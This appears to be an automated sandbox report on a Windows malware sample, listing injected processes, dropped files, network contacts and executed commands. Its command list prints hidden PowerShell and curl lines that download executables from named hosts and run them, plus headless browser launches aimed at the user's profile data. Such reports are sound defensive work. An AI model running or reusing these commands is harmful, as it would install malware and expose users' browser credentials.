Technical Information
Malicious functions
Injects code into
the following system processes:
- <SYSTEM32>\legacynetuxhost.exe
Modifies file system
Creates the following files
- %TEMP%\bk790340.exe
- %ALLUSERSPROFILE%\vstos
- %ALLUSERSPROFILE%\bungee.boo
- %TEMP%\cld.db
- %TEMP%\cccwf.tmp
- %TEMP%\etilqs_xcpswidekhxipbc
- %TEMP%\etilqs_pm2fx59er0pdko9
- %TEMP%\dll_debug.txt
- %TEMP%\brx
- %TEMP%\crx
- %TEMP%\etilqs_omgc8udjuubmoxk
- %ALLUSERSPROFILE%\cdat.bin2240
Deletes following files that it created itself
- %TEMP%\cld.db
- %TEMP%\crx
- %TEMP%\cccwf.tmp
- %TEMP%\brx
Moves the following files
- from %ALLUSERSPROFILE%\bungee.boo to %WINDIR%\omadmapi.dll
Modifies the following files
- %LOCALAPPDATA%\google\chrome\application\debug.log
Network activity
Connects to
- 'vc###ibrary.uk':443
- 'x1.#.lencr.org':80
- '19#.#58.198.23':80
- 'dn#.google':443
- '18#.#1.234.105':80
- 'st####ommunity.com':443
- 'da##side.cy':80
- 'da##side.cy':443
- 'e8.#.lencr.org':80
- 'google.com':80
- 'localhost':49707
- 'localhost':49711
- 'localhost':49715
- 'localhost':49719
- 'localhost':49725
- 'google.com':443
- 'clients2.google.com':443
- 'tr######e.googleapis.com':443
- 'clients4.google.com':443
- 'clients3.google.com':443
- 'ss#.#static.com':443
- 'localhost':49744
- 'localhost':49748
- 'localhost':49752
- 'localhost':49756
- 'fi###.catbox.moe':443
- 'localhost':49767
TCP
HTTP GET requests
- http://x1.#.lencr.org/
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?fd##############
- http://st####ommunity.com/profiles/76561198764661885/ajaxaliases/
- http://da##side.cy/Stb/PokerFace/init.php?id###############
- http://e8.#.lencr.org/84.crl
Other
- 'vc###ibrary.uk':443
- 'dn#.google':443
- 'st####ommunity.com':443
- 'da##side.cy':443
- 'localhost':49707
- 'localhost':49708
- 'localhost':49711
- 'localhost':49712
- 'localhost':49715
- 'localhost':49716
- 'localhost':49719
- 'localhost':49720
- 'localhost':49725
- 'localhost':49726
- 'clients2.google.com':443
- 'tr######e.googleapis.com':443
- 'google.com':443
- 'ss#.#static.com':443
- 'localhost':49744
- 'localhost':49745
- 'localhost':49748
- 'localhost':49749
- 'localhost':49752
- 'localhost':49753
- 'localhost':49756
- 'localhost':49757
- 'fi###.catbox.moe':443
- 'localhost':49767
- 'localhost':49768
UDP
- DNS ASK vc###ibrary.uk
- DNS ASK x1.#.lencr.org
- DNS ASK dn#.google
- DNS ASK st####ommunity.com
- DNS ASK da##side.cy
- DNS ASK e8.#.lencr.org
- DNS ASK google.com
- DNS ASK clients2.google.com
- DNS ASK clients4.google.com
- DNS ASK tr######e.googleapis.com
- DNS ASK clients3.google.com
- DNS ASK ss#.#static.com
- DNS ASK fi###.catbox.moe
Miscellaneous
Searches for the following windows
- ClassName: 'Chrome_MessageWindow' WindowName: '%LOCALAPPDATA%\Google\Chrome\User Data'
Creates and executes the following
- '%TEMP%\bk790340.exe'
Executes the following
- '<SYSTEM32>\cmd.exe' /c start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=d4vm3kRIU7hPzdWB0oDSW001.txt' -OutFile $env:TEMP\BK790340.exe; Start-Proc...
- '<SYSTEM32>\cmd.exe' /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=d4vm3kRIU7hPzdWB0oDSW001.txt' -OutFile $env:TEMP\BK790340.exe; Start-Process -FilePath $env:TEM...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=d4vm3kRIU7hPzdWB0oDSW001.txt' -OutFile $env:TEMP\BK790340.exe; Start-Process -FilePath $env:TEMP\BK790340.exe...
- '<SYSTEM32>\legacynetuxhost.exe'
- '<SYSTEM32>\cmd.exe' cmd.exe /c "move "%ALLUSERSPROFILE%\bungee.boo" "%WINDIR%\omadmapi.dll""
- '<SYSTEM32>\cmd.exe' /c "move "%ALLUSERSPROFILE%\bungee.boo" "%WINDIR%\omadmapi.dll""
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --headless --disable-gpu --no-sandbox --disable-dev-shm-usage --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\User Data" --remote-debugging-port=0
- '<SYSTEM32>\cmd.exe' dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin2240
- '<SYSTEM32>\cmd.exe' curl -o "%TEMP%\e06fe444-61a3-4b5b-a8b4-1d922cdbde79.tmp" "https://files.catbox.moe/lvh9j3.bin"
- '<SYSTEM32>\curl.exe' -o "%TEMP%\e06fe444-61a3-4b5b-a8b4-1d922cdbde79.tmp" "https://files.catbox.moe/lvh9j3.bin"
- '<SYSTEM32>\cmd.exe' dir /a /s /b C:\*imgui_impl_win32.cpp C:\*.suo C:\*.exe C:\*.vcxproj C:\*.csproj > %ALLUSERSPROFILE%\CDat.bin2240
- '<SYSTEM32>\cmd.exe' curl -o "%TEMP%\tx_1780173415091.exe" "https://files.catbox.moe/lvh9j3.bin"
- '<SYSTEM32>\curl.exe' -o "%TEMP%\tx_1780173415091.exe" "https://files.catbox.moe/lvh9j3.bin"
- '<SYSTEM32>\cmd.exe' curl -o "%TEMP%\tx_1780173437801.exe" "https://risesmp.net/britney.exe"
- '<SYSTEM32>\curl.exe' -o "%TEMP%\tx_1780173437801.exe" "https://risesmp.net/britney.exe"
- '<SYSTEM32>\cmd.exe' start %TEMP%\tx_1780173437801.exe
- '%TEMP%\bk790340.exe' ' (with hidden window)
- '%LOCALAPPDATA%\google\chrome\application\chrome.exe' --headless --disable-gpu --no-sandbox --disable-dev-shm-usage --user-data-dir="%LOCALAPPDATA%\Google\Chrome\User Data" --remote-debugging-port=0' (with hidden window)
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --headless --disable-gpu --no-sandbox --disable-dev-shm-usage --user-data-dir="%LOCALAPPDATA%\Microsoft\Edge\User Data" --remote-debugging-port=0' (with hidden window)
